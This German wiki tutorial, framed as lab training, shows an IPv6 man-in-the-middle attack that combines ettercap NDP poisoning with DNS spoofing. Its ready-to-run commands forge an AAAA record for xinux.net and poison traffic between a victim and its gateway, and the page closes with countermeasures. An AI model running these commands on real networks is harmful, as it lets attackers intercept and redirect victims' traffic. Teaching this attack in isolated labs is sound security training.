IPv6 NDP plus DNS Spoofing Ettercap

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

IPv6 Man-in-the-Middle Angriff mit DNS Spoofing

Einleitung

Dieser Artikel beschreibt einen IPv6-basierten Man-in-the-Middle (MitM) Angriff mit DNS-Spoofing, der für Schulungszwecke in abgeschotteten Laboren eingesetzt werden kann. Der Angriff demonstriert die praktische Anwendung von NDP Poisoning (Neighbor Discovery Protocol) kombiniert mit DNS-Manipulation.

Voraussetzungen

Netzwerkkonfiguration

  • Angreifer: 2003:a:32a:1799::3:1
  • Opfer: 2003:a:32a:1799::2:1
  • Gateway: 2003:a:32a:1799::1
  • Zieldomain: xinux.net

Benötigte Software

  • apt-get install ettercap-graphical

Konfiguration

DNS-Eintrag erstellen

Der Angreifer konfiguriert einen gefälschten DNS-Eintrag:

  • echo -e "xinux.net AAAA 2003:a:32a:1799::3:1" > /etc/ettercap/etter.dns

Variablen setzen

  • ANGREIFER=2003:a:32a:1799::3:1
  • OPFER=2003:a:32a:1799::2:1
  • GW=2003:a:32a:1799::1

Angriffsdurchführung

NDP Poisoning mit DNS Spoofing

Der Angreifer startet den Man-in-the-Middle Angriff:

  • ettercap -Tq -i eth0 -M ndp -P dns_spoof //$OPFER/ //$GW/

Alternative: Bidirektionales Poisoning

Für erweiterte Angriffe kann bidirektionales Poisoning eingesetzt werden:

  • ettercap -Tq -i eth0 -M ndp -P dns_spoof /$OPFER,$ANGREIFER///$ANGREIFER,$OPFER//

Verifikation

Beim Opfer

Das Opfer testet die DNS-Auflösung:

  • ping6 xinux.net
Erwartete Antwort: PING xinux.net(2003:a:32a:1799::3:1)
Tatsächliche IP: 94.130.248.215 (IPv4) oder 2a01:4f8:141:44a5::1337 (IPv6)

NDP-Tabelle prüfen

  • ip -6 neighbor show

Technische Erklärung

NDP Poisoning

  • Vergiftet die IPv6 Neighbor Discovery Protocol Tabellen
  • Der Angreifer gibt sich gegenüber dem Opfer als Gateway aus
  • Der Angreifer gibt sich gegenüber dem Gateway als Opfer aus

DNS Spoofing

  • Manipuliert DNS-AAAA-Anfragen (IPv6)
  • Leitet legitime Domains auf die IP des Angreifers um
  • Ermöglicht Abfangen und Modifizieren von Traffic

Gegenmaßnahmen

  • IPv6 RA Guard: Router Advertisement Protection
  • SEcure Neighbor Discovery (SEND): Kryptografische Verifizierung
  • NDP Monitoring: Überwachung anomaler NDP-Aktivitäten
  • DNS over TLS/HTTPS: Verschlüsselte DNS-Abfragen

Siehe auch

Abgerufen von „http://wiki.ixheim.de/index.php?title=IPv6_NDP_plus_DNS_Spoofing_Ettercap&oldid=65245